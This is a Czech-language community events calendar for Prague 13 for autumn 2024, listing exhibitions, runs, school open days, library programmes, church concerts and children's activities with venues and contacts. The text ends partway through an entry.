    <t>KALENDÁŘ AKCÍ Pondělí 7. 10. – pátek 29. 11. Kněžna sv. Ludmila Před radnicí MČ Praha 13, Sluneční náměstí 2580/13 Městská část Praha 13 a Spolek svatá Ludmila vás zvou na výstavu o kněžně sv. Ludmile , kterou můžete zhlédnout v průběhu října a listopadu před radnicí Prahy 13. Čtvrtek 31. 10. – sobota 30. 11. Labyrint mysli – prodejní výstava obrazů Jitky Dosoudilové Komunitní centrum Krista Spasitele, Grussova 1274/6, Praha 5-Barrandov Srdečně zveme na prodejní výstavu digitálních obrazů a koláží Jitky Dosoudilové. Fantaskní krajiny, abstrakce i digitální koláže přinášejí fantazii, originalitu a barevnost, i když paradoxně za jejich vznikem je onemocnění autorky rakovinou. Žádnou temnotu ani smutek v nich ale nenajdete. Vernisáž výstavy se koná 7. listopadu od 18.00. Sobota 2. 11. • 10.00 Třetí ročník běhu kolem Asuánu Retenční nádrž Asuán Srdečně vás zveme na 3. ročník Běhu kolem Asuánu , příjemného podzimního krosu pro malé i velké běžecké nadšence. Začínáme v 10.00 dětskými kategoriemi, start dospělých je potom naplánován na 11.30. Kromě sportovního zážitku se můžete těšit na výborný čaj, občerstvení domácí výroby a samozřejmě na diplomy a medaile! Podrobné propozice a výsledky budou k dispozici na webu www.atletikastodulky.cz. Startovné je dobrovolné. Sobota 2. 11. • 12.00–16.00 1. Velká Kočkiáda 2024 KD Mlejn, Kovářova 1615/4, Praha 13 Nenechte si ujít velkou kočičí akci: soutěž krásy Miss Kočka, zábavný program, odborné poradny, prodejní stánky, útulky... Veškerý výtěžek jde na pomoc kočkám v nouzi. Více na https://milujemekocky.cz. Neděle 3. 11. • 11.00 Vdolková štafeta U Stodůleckého rybníka v Centrálním parku Sportklub Bessie zve na zábavnou štafetu pro běžce/rodiče/ děti/maminky s kočárky či odrážedly. Závod se uskuteční v Centrálním parku u ulice Sezemínská, více informací a registrace na https://sportklub-praha13.cz/vdolky. Neděle 3. 11. • 16.00 Stodůlecký folklorní ples KD Mlejn, Kovářova 1615/4 Lučinka vás zve na taneční ples ve folklorním stylu. Začátek programu bude patřit především dětem - vystoupení Lučinky, výuka tanců, volná taneční zábava a hlavně tombola. Poté si ale na své přijdou i dospěláci, kteří se pobaví během folklorního večírku. Více informací se dozvíte na www.fslucinka.cz, těšíme se na vás. Úterý 5. – pátek 15. 11. Gymnázium Jaroslava Heyrovského slaví 30 let Atrium radnice městské části Praha 13 , Sluneční náměstí 2580/13 U příležitosti 30. výročí založení Gymnázia Jaroslava Heyrovského (1994/2024) budou v atriu radnice v úředních hodinách úřadu vystaveny výtvarné práce studentů tohoto gymnázia. Úterý 5. 11. • 14.00 Retrokavárna KD Mlejn, Kovářova 1615/4 Program Retrokavárny bude tentokrát zaměřen na právní poradenství v oblasti nakládání s majetkem a na úskalí s tím spojená (darování bytů, převody nemovitostí, věcná břemena apod.). Přednášet bude paní Jana Prosmanová. Zájemci o přednášku si mohou rezervovat místo u paní Zuzany Kraljové na telefonním čísle 235 011 451. Další termín Retrokavárny: 3. prosince. Úterý 5. 11. • 16.00 Z předškoláčka školáčkem ZŠ Janského, Janského 2189 ZŠ Janského připravila školičku,pro všechny budoucí prvňáčky a nulťáčky. Po celý školní rok si mohou všichni vyzkoušet, jaké to je chodit do velké školy, seznámí se s učiteli, poznají budoucí spolužáky, zažijí super zábavu a procvičí nejen tělo, ale i mysl. Tentokrát na téma Předškolák hrnčířem (metody výuky na prvním stupni, hodnocení). Prosíme o přihlášení dítěte do školičky na uvedeném kontaktu v.ramsova@zs-janskeho.cz. Na všechny se moc těšíme v ZŠ Janského. Další termíny 2. 12. 2024 a 7. 1., 4. 2. a 4. 3. 2025. Pátek 8. – sobota 9. 11. Pyžamková party pro děti v Juklíku Plavecké centrum Juklík , Praha 13, U Jezera 2031 Kdy jste měli naposledy volnou chvilku jen pro sebe nebo si užili čas s partnerem? Máme pro vás řešení! Přenechte děti zkušeným lektorům. Pořádně se vydovádějí a naučí se mnoho nového, zatímco vy si odpočinete. Můžete vybírat hned ze dvou termínů: 8.-9. 11. a 13.-14. 12. Akce začíná v pátek v 17.00 a končí v sobotu v 18.00. Děti budou plavat, tvořit, hrát si, a zažijí dobrodružnou noc. Stačí jim sbalit plavky, dva ručníky, pohodlné oblečení, spacák, karimatku, kartáček na zuby a nezapomenout na oblíbeného plyšáka. V Juklíku je jedno jisté - děti se vám vrátí vždy nadšené a krásně čisté! Předchozí rezervace je nezbytná, osobně nebo na tel. 251 610 441. Více na www.juklik.cz. Sobota 9. 11. • 7.00 Výlov mezi paneláky Stodůlecký rybník v Centrálním parku Nenechte si ujít již tradiční výlov, který je zajímavou podívanou nejen pro děti. Výlov pořádá Český rybářský svaz, místní organizace Jinonice. Sobota 9. 11. • 10.00 Pohádkové dopoledne - Tři kouzelné pohádky Divadelní sál FZŠ prof. Otokara Chlupa , Fingerova 2186 „Tři kouzelné pohádky” - představení tří klasických pohádek (O rybáři a rybce, O ševci a čertovi a O ušaté princezně) hraje soubor Divadla GLANS, začátek představení 10.00, jednotné vstupné 120 Kč (pokladna je otevřena hodinu před začátkem představení). Více na www.divadloglans.cz. Neděle 10. 11. • 15.00 Charitativní koncert na podporu pacientů s FA Kostel sv. Jakuba staršího ve Stodůlkách Pacientská organizace Frieda, z.s., pomáhající pacientům s velmi vzácným degenerativním onemocněním Friedreichova ataxie, vás srdečně zve na charitativní koncert na podporu lidí žijících s touto nemocí. Účinkují bývalí členové Kühnova dětského sboru, varhaník: Ondřej Luštinec, trubka: Jakub Houška. Na programu bude duchovní sborová a varhanní hudba. Arcadelt, Mozart, Bach, Lukáš, Franck, Martinů a další. Vstupné je dobrovolné. Veškerý výtěžek akce je příspěvkem do vyhlášené veřejné sbírky na podporu pacientů s FA. Více na www.frieda.cz. Úterý 12. 11. • 16.00–17.30 Svatomartinské slavnosti FZŠ Trávníčkova, Trávníčkova 1744 Srdečně vás zveme na Svatomartinské slavnosti, které se uskuteční na pozemku FZŠ Trávníčkova. Přijďte si užít odpoledne plné zábavy, tradičních dobrot a příjemné atmosféry! Těšíme se na vaši účast. Sobota 16. 11. • 17.00 Strašidla v Třebonicích Start u rybníka v Třebonicích Hasiči Třebonice a Magistrát hl. m. Prahy zvou děti a rodiče na strašidelnou stezku v Třebonicích . Start bude u rybníka v Třebonicích . Lampiony na cestu s sebou. Pondělí 18. 11. – neděle 12. 1. 2025 Zachumelené betlémy Rovná 352, Ořech Od 18. listopadu do 12. ledna 2025 bude výstava betlémů otevřena každý víkend od 10.00 do 18.00 a na objednávku pro skupiny i v jiných, předem domluvených termínech. Jak název Zachumelené betlémy napovídá jsou pro letošní výstavu vybrány betlémy na téma Děti a sníh. Prohlédnout si tak budete moci betlémy plné sněhu a dětí nejen z depozitáře muzea, ale také ty, které si právě pro tuto výstavu zapůjčili z Muzea betlémů v Třebechovicích , ze Středočeského muzea v Roztokách a od soukromých autorů a sběratelů. Uvidíte i Velký betlém příběhů po první etapě přestavby. Do 8. prosince bude k vidění i velký mechanický Jubilejní betlém, který se pak přestěhuje na velkou výstavu do Břevnovského kláštera a na jeho místě budete moci obdivovat dva jiné. Poprvé budete moci zhlédnout vyřezávaný a barvený Dobřanský zimní betlém Jana Hrnčíře , rovněž vyřezávaný a obsáhlý betlém pana Votruby ze Slivence , který je na motivy Josefa Lady , mechanický skříňkový Spolkový betlém a plno dalších. Více na www.muzeumceskychvanoc.cz. Pondělí 18. 11. – pátek 6. 12. Výstava fotografií Pavla Drdela Atrium radnice MČ Praha 13, Sluneční náměstí 2580/13 Výstava fotografií výjimečného fotografa, skvělého kuchaře, úspěšného majitele restaurace a aktivního ambasadora charitativních a společensky prospěšných projektů. Vernisáž výstavy proběhne 18. listopadu v 15.00. Středa 20. 11. • 7.45–8.00 a 11.40–18.00 Vánoční dobročinný jarmark Základní škola Lužiny , Trávníčkova 1743 Vážení rodiče, milé děti, rádi bychom vás pozvali na vánoční dobročinný jarmark, který se uskuteční 20. listopadu, v časech 7.45-8.00 a 11.40-18.00, v prostorách venkovní učebny v areálu školy. Těšíme se na vaši návštěvu! Středa 20. 11. • 8.00–11.40 a 16.00 Den otevřených dveří v ZŠ Kuncova Základní škola Kuncova, Kuncova 1580/1 Srdečně vás zveme na Den otevřených dveří, který se koná ve středu 20. listopadu dopoledne. Od 8.00 do 11.40 hod. můžete zhlédnout výuku ve třídách a v odborných učebnách I. i II. stupně, odpoledne od 16 hodin proběhne setkání s ředitelem školy v nové školní jídelně, po kterém následuje komentovaná prohlídka školních prostor. Návštěvníci uvidí nejen nově vybudovanou učebnu fyziky s hvězdným stropem, další odborné a kmenové učebny, školní dílnu, počítačové učebny s clicboty a ozoboty a pěkný interiér školy a její materiální vybavení, ale budou seznámeni i s výukovou nabídkou pro příští školní rok. Bližší informace naleznete na www.zskuncova.org nebo se je dozvíte na tel. 235 520 975 popř. tel. 235 520 991. Těšíme se na setkání s vámi! Středa 20. 11. • 17.30 Lampiónový průvod Sraz u Kuželkárny, Centrální park Prahy 13 Sportklub Bessie zve na lampiónový průvod na připomenutí, že uplynulo 1000 dnů od začátku invaze na Ukrajinu . Sraz v 17.30 u Kuželkárny, projdeme (proklušeme) beze slov (nejsou potřeba) trasu 1 000 metrů s lampióny, balónky atd. v modrožlutých barvách. Informace budou na https://sportklub-praha13.cz/lampiony. Sobota 23. 11. • 9.00–13.30 Dvě šance v trávě FZŠ Trávníčkova, Trávníčkova 1744 Jedinečná možnost vyzkoušet si něco nového. Děti si vyberou z nabídky různorodých workshopů. Mohou si vyzkoušet naprogramovat několik různých robotů, ukážeme si nejzajímavější trendy z oblasti programování, logických her a vědy. Vyber si dva workshopy a přijď za námi. Více na www.tib.cz a na str. 4. Neděle 24. 11. • 16.00–19.00 Dětský karneval na ledě Školní zimní stadion Bronzová, Bronzová 1387 Rádi bychom vás pozvali na druhý ročník Dětského karnevalu na ledě. Programem bude provázet moderátorka Rádia Junior a zpěvačka Jana Rychterová za doprovodu maskota sdružení - pio psa Tobíka. Pro dětské účastníky připravujeme drobné soutěže o věcné ceny. Akce je otevřena pro širokou veřejnost. Více na www.rondel.pionyr.cz. Akce se koná za podpory ÚMČ Praha 13 a MŠMT . Neděle 24. 11. • 17.00 Zábavná diskotéka v Monkey´s Gym Westfield Chodov, Roztylská 2321/19, Praha 4 Galerie Harfa, Českomoravská 2420/15a, Praha 9 OC Šestka, Fajtlova 1091/1, Praha 6 Udělejte dětem radost a vezmete je na zábavnou diskotéku s opičkou Lolou do některé z krásně vybavených a barevných tělocvičen Monkey ´s Gym. Děti si pod dohledem zkušených a nápaditých lektorů zařádí a zatancují na známé dětské písničky. Předtančení se ujme zdejší oblíbený maskot - opička Lola. A bude tu skutečně veselo. Akce je určena pro všechny malé tanečníky starší 2,5 let (s mladšími dětmi musí být v tělocvičně po celou dobu diskotéky přítomný dospělý, ale skvěle se jistě pobaví i ten). A pokud to nestihnete v říjnu, nezoufejte, diskotéku s opičkou Lolou v Monkey´s Gym pořádají každou poslední neděli v měsíci! Úterý 26. 11. • 11.00 Adventní floristika Komunitní centrum sv. Prokopa , V Hůrkách 8 Městská část Praha 13 ve spolupráci s Římskokatolickou farností sv. Jakuba st. vás zvou na adventní vázání věnců. Veškeré potřeby budou připraveny. Počet míst je omezený, svoji účast nahlaste nejdříve od 4. listopadu u paní Zuzany Kraljové na telefonním čísle 235 011 451. Středa 27. 11. • 16.00 Podzimní školička pro budoucí prvňáčky – 1. setkání ZŠ Mohylová , Mohylová 1963/2 Děti předškolního věku si na setkání vyzkoušejí dovednosti, které se jim budou hodit při nástupu do první třídy. Rodiče se mezitím dozví o výukových metodách v ZŠ Mohylová . Sobota 30. 11. • 9.00–13.00 Adventní výtvarná dílna ZŠ Mohylová , Mohylová 1963/2 Zveme vás na Adventní výtvarnou dílnu. Přijďte se naladit vánoční atmosférou do naší školy, kde si můžete vyrobit adventní věnce, svícny, dekorace. Děti si mohou ozdobit různé druhy svíček, nazdobit perníčky nebo připravit dárečky pod stromeček. Přineste si jen ostrý nůž nebo nůžky, další výrobní materiál dostanete na místě. Pro hladové nebo upracované bude připravena kavárna a výborný guláš nebo chlebíčky, které připraví naše paní kuchařky. Těšíme se na vás! Pondělí 2. 12. • 16.00 Z předškoláčka školáčkem ZŠ Janského, Janského 2189 ZŠ Janského připravila školičku, pro všechny budoucí prvňáčky a nulťáčky. Po celý školní rok si mohou všichni vyzkoušet jaké to je chodit do velké školy, seznámí se s učiteli, poznají budoucí spolužáky, zažijí super zábavu a procvičí nejen tělo, ale i mysl. Tentokrát na téma Předškolák malířem (volnočasové a mimoškolní aktivity). Prosíme o přihlášení dítěte do školičky na uvedeném kontaktu v.ramsova@zs-janskeho.cz. Na všechny se moc těšíme v ZŠ Janského. Další termíny 7. 1., 4. 2. a 4. 3. 2025. Úterý 3. 12. • 14.00 Retrokavárna KD Mlejn, Kovářova 1615/4 V prosinci zpříjemní předvánoční čas v Retrokavárně duo Dobrý lidi a zazpívají duety známé i neznámé. „Jsou na světě i dobrý lidi, a ti k sobě přitahují další. Proto si naše folkové duo dalo jméno Dobrý lidi, aby k sobě další podobné přivedlo. Naším krédem je rozdávat radost a potěšit ostatní. Nemáme vlastní písničky, ale o to lépe se lidem s námi zpívá. Zavzpomínejte s námi na šedesátá léta, ale hrajeme i písně současné. Přidejte se k nám a přijďte si nás poslechnout, možná i zazpívat.“ Maria Wohlrabová a Pavel Machek (Dobrý lidi). Zájemci o prosincový program Retrokavárny si mohou rezervovat místo u paní Zuzany Kraljové na tel. 235 011 451. Středa 4. 12. • 10.00–18.00 Vánoční jarmark Obřadní síň a atrium radnice MČ Praha 13, Sluneční náměstí 2580/13 Městská část Praha 13 si vás srdečně dovoluje pozvat na 5. ročník Vánočního jarmarku. Přijďte si s námi užít předvánoční čas, potěšit se krásnými věcmi a naladit se na kouzelnou vánoční atmosféru. Pro děti budou připraveny kreativní dílničky. Více na straně 4. Sobota 7. 12. • 15.00 Mikulášská nadílka Horní hasičárna v Třebonicích Zveme děti a dospělé na příjemné prožití adventu k horní hasičárně v Třebonicích . Pro děti je nachystán bohatý program a nebude chybět ani nadílka od Mikuláše. Více na Facebooku našeho sboru - Hasiči Třebonice . Sobota 7. 12. • 15.00 Mikulášská nadílka Komunitní zahrada Prokopka (ulice Herčíkova, vedle MŠ Úsměv) Spolek Pro kořínky, z.s., vás srdečně zve na Mikulášskou nadílku. V tento den se společně zahřejeme u ohně, povyprávíme si příběhy, zazpíváme koledy a děti si ozdobí perníčky. Společně si také nachystáme něco dobrého na sousedský stůl a děti dostanou balíčky od Mikuláše s andělem. Z kapacitních důvodů je nutná registrace. Registrační formulář naleznete na našich webových stránkách www.zahradaprokopka.cz. Více na straně 4. BOTANICKÁ ZAHRADA HL. M. PRAHY Trojská 800/196, Praha 7 – Troja Venkovní expozice je v listopadu otevřena denně 9.00- 19.00, skleník Fata Morgana út-ne a svátky 9.00-19.00, vinotéka sv. Kláry po-ne a svátky 10.00-19.30. Neděle 14. 1. – 15. 12. • 13.00–15.00 Nedělní sklep - nahlédněte do zákulisí výroby vína Komentované prohlídky vinice a sklepa s malou degustací na závěr. Více na webových stránkách zahrady. Do neděle 3. 11. Výstava dýňových aranžmá Expozice Ornamentální zahrady a expozice Les Přijďte zažít jedinečnou výstavu dýní inspirovanou mexickými oslavami Día de los Muertos. Těšit se můžete na originální dýňová aranžmá i tvořivé víkendové workshopy. Podzim je nejbarevnějším obdobím roku a příroda hraje škálou barev, kterou nedokáže namíchat žádný malíř a my vám během výstavy tuto pestrou paletu přiblížíme. Výstavu tradičně 31. října doplní oslavy Halloweenu a večerní lampionový průvod zahradou. Zažijte spojení mexické kultury a podzimní atmosféry v naší zahradě a dopřejte si tak podzim plný zábavy a kreativního tvoření pro malé i velké. Pondělí 11. 11. • 10.00 Svatomartinský přípitek Svátek sv. Martina není jen příslibem zimy, ale i oslavou Svatomartinského vína ! Sněhovou nadílku zaručit nemůžeme, ale vybranou pětici mladých vín, to umíme. Vinotéka sv. Kláry bude výjimečně otevřena už od 10.00 hodin, máte tak ideální příležitost připít si už před polednem a vychutnat si nejen naše vína ročníku 2023, ale především výběr Svatomartinských vín z Vinařství Mádl ročník 2024 a společně zjistíme, jak se jim vydařila. Pátek 15. 11. – 5. 1. 2025 Sedmý šálek čaje Výstav plná vůní a chutí za poznáním cesty čaje. Co skrývá šálek čaje? Potěšte své smysly a objevte barvu, vůni i chuť nápoje, který změnil svět. Nechte se přenést nejen do Japonska a Číny - cestujte s námi v prostoru i čase. Zjistěte, jak a kde se čajovník pěstuje a sklízí, kdy se čaj dostal do Evropy , co všechno léčí a jak se správně podává a připravuje. Nahlédněte do misky čajového mistra a projděte se čajovou zahradou. Výstava je věnována významné české sinoložce paní Věně Hrdličkové, která by letos na podzim oslavila 100 let a dlouhodobě spolupracovala s botanickou zahradou. Pátek 15. 11. – sobota 14. 12. Džungle, která nespí Komentované prohlídky skleníku Fata Morgana po setmění Naši průvodci pro vás připravili zajímavé putování horami i nížinami, při kterém se vám bude tajit dech. Některé druhy rostlin rozkvétají v noci a omamně voní a celým skleníkem se nese koncertování tropických žabek... Pátek 29. 11. 2024 – neděle 2. 2. 2025 Křišťálová zahrada Historicky poprvé se naše botanická zahrada v zimě rozzáří a rozkvete monumentálními skleněnými instalacemi, které oživí hra světel a hudby. Čekají na vás desítky fantastických instalací s motivy rostlinné a zvířecí říše z dílny uměleckého skláře Jiřího Pačinka . Zahradu bude možné navštívit ve dne i večer a prožít tak neopakovatelný umělecký zážitek. Více o akcích a novinkách najdete na www.botanicka.cz, info@botanicka.cz, tel. 234 148 111. OC LUŽINY Archeologická 2256/1, Lužiny Neděle 3., 10., 17. a 24. 11.; 1. 12. • 11.00 Divadélka OC Lužiny před pobočkou FIO banky Představení začínají v 11.00 a trvají cca 50 minut. Jednotlivá představení zajišťují profesionální divadelní soubory. Věková kategorie dětských diváků je 3 - 9 let. Upozorňujeme návštěvníky, že může dojít k naplnění kapacity. Kapacita je omezena na cca 90 dětí. 3. 11. Nezávislé divadlo - Podzimní Čarohraní 10. 11. Divadlo Úsměv Ludmily Frištenské - O Myslivci Martinovi 17. 11. Nezávislé divadlo - Jeníček a Mařenka 24. 11. Divadlo Koník - O Budulínkovi 1. 12. Divadlo Úsměv Ludmily Frištenské - Vánoce s pejskem a kočičkou Více na www.ocluziny.cz, Facebook : OC Luziny. MĚSTSKÁ KNIHOVNA – POBOČKA STODŮLKY Kovářova 1615/4, Praha 13 Pohádková babička, dědeček čte dětem Dovolujeme si upozornit na chystané čtení pro mladší děti Pohádková babička, dědeček čte dětem. Čtení bude probíhat na pobočce Stodůlky v KD Mlejn. Datum a čas čtení, prosím, sledujte na webových stránkách knihovny nebo zatelefonujte na tel. 770 130 284. Děkujeme a těšíme se na vás. Výstava obrazů Zveme vás na výstavu obrazů olej Bohuslava Doležala - Výběr z díla. Pan Doležal kromě pobočky Stodůlky vystavoval na různých místech ČR, např. v Dobříši , Vysokém Mýtě , Pardubicích , ale také v zahraničí, např. Berlíně , Francii , Vídni . Přijďte se osobně podívat a potěšit oko a duši. Pondělky 4., 11., 18. a 25. 11. • 13.00–14.00 Euroklíč Klíč, s jehož pomocí se dostane osoba se zdravotním postižením či rodiče/pěstouni pečující o dítě do 3 let na vybraná bezbariérová WC a plošiny ve veřejných budovách, v metru, na nádražích i na čerpacích stanicích ve většině států Evropy . Vydává se zdarma na pobočce na základě předchozí domluvy tel. 776 246 938. Středy 6., 13., 20. a 27. 11. • 16.00 Scrabble Všechny zájemce o deskovou hru scrabble zveme na pravidelná hrací odpoledne od 16.00 hod. Neumíte ji, nevadí, tak se ji naučíte. Pobavíte se, procvičíte mozek a ještě posedíte mezi příjemnými lidmi. Neseďte doma sami a přijďte. Středy 6. a 20. 11. • 16.00–17.30 Deskovky na Stodůlkách Přijďte si zahrát deskové hry do pobočky Stodůlky. Co vás čeká? Široký výběr her, které si mohou zahrát všichni i úplní začátečníci. Můžete přinést i svoji oblíbenou deskovou hru a tu nás naučit. Čtvrtky 7. a 21. 11. • 16.00–19.00 Posezení při kytarách Muzikanti zahrajte sobě a ostatním pro radost. Jste všichni srdečně zváni do pobočky Stodůlky v KD Mlejn ke společnému hraní. Můžete posedět, zazpívat si i se přidat a zahrát si. Středa 13. 11. • 16.00–18.00 Dílničky pro děti, rodiče, prarodiče Výroba závěsného obrázku Noc a den, práce s voskovými barvami. Středa 27. 11. • 17.00 Divadlo pro děti - Vánoční loutková hra Srdečně zveme na divadýlko pro děti a rodiče vytvořené podle vánočních lidových her. Uvidíte pastýře, čerta, anděla, klanění králů, narození Ježíška. Hra je proložená známými i méně známými koledami, a tak si můžete i zazpívat. Čtvrtek 28. 11. • 17.30 Cestopisná beseda - Jak jsem (ne)šla poutní cestou do Santiaga de Compostela Nizozemský autor Noteboom ve své knize Desvío a Santiago říká, že Itálii si člověk zamiluje na první pokus, kdežto k lásce ke Španělsku se musí prodrat. Pokusím se přiblížit putování po Camino de Norte, Camino Francés a Camino Inglés, které jsem s přítelem prošla při naší společné cestě severním Španělskem . Ukážu vám zjevné i skryté krásy severního Španělska , od Cantabrie po Galicii , kouzlo přírody, milé lidi, pestrou a zároveň specifickou povahu poutníků i poutnickou cestu do Santiaga . Přiblížím vám jak tvář moderního Španělska , tak i historická a zajímavá místa spjatá s předkřesťanskou i křesťanskou kulturou a s fenomény reconquisty - zpětného dobývání poloostrova křesťany a vytlačování Maurů, svatého Jakuba Maurobijce a poutnictví k hrobu tohoto apoštola. Přednášející M. Hulešová. Vstup na akce je volný. Změna programu vyhrazena. Více na www.mlp.cz/stodulky. MĚSTSKÁ KNIHOVNA – POBOČKA LUŽINY Archeologická 2256/1, Praha 13 Středy 6., 13., 20. a 27. 11. • 11.00 Vycházky s knihovnicí Káčou Pokračujeme ve vycházkách nejen po okolí knihovny. Program jednotlivých vycházek najdete na pobočce a na webu. Čtvrtky 7., 14., 21. a 28. 11. • 10.00–12.00 Čtvrteční klub dobré nálady Každý týden dámský klub. Program najdete na pobočce. Čtvrtky 7., 14., 21. a 28. 11. • 12.00–13.00 Digitální poradna Přijďte si pro radu s mobilem, tabletem nebo počítačem. Možnost také individuální konzultace na objednání. Pátky 8., 15., 22. a 29. 11. • 14.00–16.00 Deskové hry klubu dobré nálady Příjemné posezení u nenáročných deskových her. Pondělí 4. 11. • 14.00 Autorské čtení knihy NiBojs Kniha, která dětem buduje lásku ke sportu. Středa 6. 11. • 17.30 Přednáška: Mýty, legendy a nestvůry v Lucembursku Spisovatelka a cestovatelka Lucie Lukačovičová vám prozradí taje a mýty Lucemburska . Sobota 9. 11. • 10.30 Loutkové divadlo : Bajaja Papírová pimprlata zahrají klasickou pohádku. Pro děti od 3 let, délka přestavení je asi 20 minut. Úterky 12. 11. a 26. 11. • 16.00–17.00 S tebou mě baví svět! Klub pro maminky i tatínky s dětmi od 0 do 5 let. 26. listopadu - Ester Stará: Rozvoj vyjadřovacích schopností hravě (pouze pro rodiče). Úterý 12. 11. • 16.30 Čtenářský klub pro mladé dospělé Neformální setkávání pro čtenáře (nejen) Young Adult ve věku 15-35 let. Úterý 19. 11. • 16.00–18.30 Bětčina textilní dílna Tentokrát budou tématem roztomilí mazlíci. Materiál zajištěn. Středa 20. 11. • 16.00 a znovu v pátek 22. 11. • 10.00 Literární hrátky: Cvičení s říkankou Pravidelný interaktivní pořad pro děti a rodiče. Středa 20. 11. • 17.30 Přednáška: Digitální minimalimus Naučte se používat digitální technologie tak, aby byly užitečné, místo toho, aby vás obíraly o čas. Čtvrtek 21. 11. • 13.00–16.00 Poradna k Digitálním službám státu Přijďte se seznámit a poradit s novými službami. E-občanka, datové schránky a jiné. Čtvrtek 21. 11. • 14.30–18.30 Turnaj v deskovkách: Kočíčí klub a Psí parťáci Zahrajte si deskové hry a zúčastněte se tak našeho prvního turnaje! Odměna jistá! Od 8 do 108 let. Úterý 26. 11. • 17.30 Přednáška: Staré Stodůlky a okolí: Historie a současnost Zveme vás na další přednášku pana doktora Nolla. Středa 27. 11. • 16.00 Workshop koláže v knihovně Pravidelné setkání milovníků koláží. Pátek 29. 11. • 17.30 Beseda s autorkou: Veronika Opatřilová – Q&amp;amp;A Otázky a odpovědi s autorkou LGBTQ+ románů Počkej na moře a Píseň L. Vstup na akce je volný. Změna programu vyhrazena. Více na www.mlp.cz/luziny. DŮM DĚTÍ A MLÁDEŽE STODŮLKY Chlupova 1800 Úterý 5. 11. • 18.00–19.30 Rodič 21. století Další přednáška z cyklu Rodič 21. století na téma Kybertabu aneb Průvodce vesmírem on-line informací. Průvodcem přednášky je Petr Naske a host. Registrace nutná, kapacita omezena. Pátek 8. 11. • 16.00–19.00 Tradiční Halloweenské odpoledne Dia de Muertos II. Mexický Halloween Dia de los muertos se chystá znovu po roce oživit zdi našeho Domečku. Po loňském úspěšném dovádění se i letos můžete těšit na pestré kostýmy a výzdobu, lahodnou mexickou kuchyni, rytmickou hudbu a mnoho dalšího. Registrace nutná, kapacita omezena. Přihlašování na www.ddmstodulky.cz bylo spuštěno 15. října. Pátek 8. 11. • 16.30–20.00 Bo!ovka: Strašidla staré Prahy Večerní bojovka pro rodiny s dětmi 2-5 členné týmy v tajemném prostředí petřínských sadů. Pondělí 11. 11. Cesta světel Výroba zvířátkového lampionu v DDM Stodůlky a doprovod sv. Martina průvodem do Centrálního parku k Nepomuckému rybníku. V tradičním průvodu jsou vítáni i další účastníci s vlastním lampionem. Úterý 12. 11. • 18.30–20.30 Léčivá strava: Do hlubin zažívacího traktu Druhá přednáška Moniky Novotné. Neváhejte a přijďte se dozvědět více o našich tělech, zažívání a získat tipy, jak si zdravě zpestřit jídelníček. Registrace nutná, kapacita omezena. Úterý 12. 11. Předporodní kurz pro těhotné ženy II. turnus Absolvování kurzu je doporučeno těhotným ženám zhruba mezi 24. až 36. týdnem těhotenství nebo dle vlastního uvážení. V kurzu budeme probírat různá témata týkající se těhotenství, porodu a období po porodu. Jako například vhodné stravování těhotné, fyzická i psychická příprava na porod, budeme si povídat o různých možnostech v průběhu porodu, o tom, co je to bonding, o péči o šestinedělku, příprava na kojení, na modelu novorozence si vyzkoušíte manipulaci, probereme také péči o výživu, spánek a hygienu dítěte do jednoho roku věku. Pondělí 18. 11. • 19.00–21.00 Přednáška klub RaDka: Jak pomoci dětem při poruchách pozornosti Pokud máte doma dítě, které má problém se soustředěním při učení nebo neudrží myšlenku, přijďte si pro několik tipů, jak mu můžete pomoci. Vstup je volný, ale vaše přihláška závazná a kapacita omezena. Přihlášení na www.ddmstodulky.cz přes klientský účet. Kontaktní osoba: Dagmar Eckhardtová, tel. 608 973 949 nebo e-mailu info@ddmstodulky.cz Pátek 22. 11. • 10.00–11.30 RvA SmysloHRANí: Všeználkové Sychravé podzimní počasí vybízí k domácím hrám a společné zábavě! Přijďte si k nám vyzkoušet, co všechno můžete z běžně dostupných věcí vytvořit pro své děti, abyste je nejen zabavili, ale také přirozeně podpořili jejich psychomotorický vývoj. Pátek 29. 11. • 15.00–19.00 Hvězdná dílna Tradiční vánoční dílna s vánočním divadelním představením Divadla Pod Kloboukem a vše kolem hvězdného vánočního nebe. Čtvrtek 5. 12. • 15.00–19.30 Čertovské odpoledne Čertíci a čertice už se těší velice, na zlobivé dětičky, na ty malé “hříšníčky”, andělíčci do balíčků přidávají po uhlíčku, Mikuláš vás volá, děti, přijďte si k nám dováděti! Čeká na vás výtvarná dílnička, pro odvážné návštěva nebe a peklíčka, ale především nadílka od hodného Mikuláše a andílka. Registrace nutná, kapacita omezena. Přihlašování startuje 11. listopadu on-line přes klientský účet. Přihlášení na akce na www.ddmstodulky.cz přes klientský účet. Více informací na www.ddmstodulky.cz a Facebooku . RODINNÉ CENTRUM RYBIČKY Třináctka - křesťanské centrum Luka, Mukařovského 1986 Herna je otevřena po-čt 9.00-12.00. Přihlášení předem není nutné. Cena vstupného na celé dopoledne je 100 Kč. Speciální akce (podrobnosti budou zveřejněny na webu rybicky.13ka.cz: • 19. 11. 10.30 Zamyšlení kazatele Davida Nováka • 30. 11. 13.00-16.00 Adventní dílna pro dospělé nutné se předem přihlásit rybicky.13ka@volny.cz. Pravidelné akce Pondělky a úterky Téma měsíce: Zvířátka - a k tomu připravené říkanky, vyrábění, zpívání, tanečky, divadélka... Středy 9.30 hod. - pohybové okénko pro děti (s doprovodem dospělého) 10.30 hod. - výtvarné tvoření pro děti Čtvrtky 9.30 hod. - hravá angličtina pro děti s Katarínkou 10.30 hod. - výtvarné tvoření pro děti Více o nás a programu na rc-rybicky.webnode.cz. ŘÍMSKOKATOLICKÁ FARNOST U KOSTELA SV. JAKUBA ST. VE STODŮLKÁCH Kovářova 21, Stodůlky Sobota 2. 11. • 16.00 Mše sv. na stodůleckém hřbitově V rámci Památky zesnulých bude v 16.00 sloužena mše svatá u kaple na hřbitově ve Stodůlkách . Neděle 3. 11. • 17.00 Mozartovo Requiem Kostel sv. Prokopa, V Hůrkách 8 Srdečně zveme na koncert, který provede komorní soubor Piccola orchestra a komorní smíšený sbor Piccola cora pod taktovkou Marka Valáška. Úterý 26. 11. • 11.00 Tvůrčí dílna pro seniory – adventní floristika Komunitní centrum sv. Prokopa , V Hůrkách 8 Zveme na tvůrčí dílnu, kde budete mít možnost si vlastnoručně uvázat adventní věnec. Veškeré potřeby budou připraveny. Akci pořádáme ve spolupráci s městskou částí Prahy 13 . Více na straně 4. Sobota 30. 11. • 14.00–17.00 Jarmark CMŠ Srdíčko Komunitní centrum sv. Prokopa , V Hůrkách 8 Tradiční jarmark Církevní mateřské školy Srdíčko. Více informací a další akce na www.farnoststodulky.cz. TŘINÁCTKA – KŘESŤANSKÉ CENTRUM LUKA Mukařovského 1986, (zastávka metra Luka) Úterky 